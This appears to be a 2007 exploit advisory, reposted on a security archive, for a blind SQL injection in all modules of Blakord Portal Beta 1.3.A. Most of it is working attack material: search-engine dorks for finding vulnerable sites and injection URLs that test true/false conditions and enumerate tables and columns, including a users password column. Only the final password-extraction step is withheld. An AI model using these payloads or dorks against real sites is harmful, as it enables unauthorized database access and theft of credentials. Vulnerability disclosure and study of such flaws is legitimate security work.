Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection

2007.12.28
Credit: JosS
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection. [+] Info: [~] Software: Blakord Portal [~] HomePage: http://www.cdv3k.com [~] Exploit: Blind Sql Injection [High] [~] Where: All Modules [~] Bug Found By: JosS / Jose Luis Gngora Fernndez [~] Contact: sys-project[at]hotmail.com [~] Web: http://www.spanish-hackers.com [~] Dork: "Power by Blakord Portal" [~] Dork2: "Powered by Blakord Portal" [~] Dork3: "Blakord Portal" [+] Compression: [~] True: http://localhost/[path]/[any module]?id=1 and 1=1 [~] False: http://localhost/[path]/[any module]?id=1 and 1=2 [+] Exploding: [*] Checking table: [~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0 [~] Exploit2: http://localhost/[path]/[any module]?id=1 and exists (select * from [TABLE]) [~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0 [~] Example2: http://localhost/[path]/[any module]?id=1 and exists (select * from users) [~] If you don't see any error, it is tha table exist. [*] Checking columns number of table: [~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER] [~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) = 6 [~] If you don't see any error, the table has 6 columns. [*] Checking columns of table: [~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0 [~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(U_PASSWORD) FROM users) >= 0 [~] If you don't see any error, the column exists. [*] Admin Password; Noob or Lammer?: [~] Exploit: Priv8 [~] Example: Priv8 [~] Priv8 , xD. [+] [The End]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top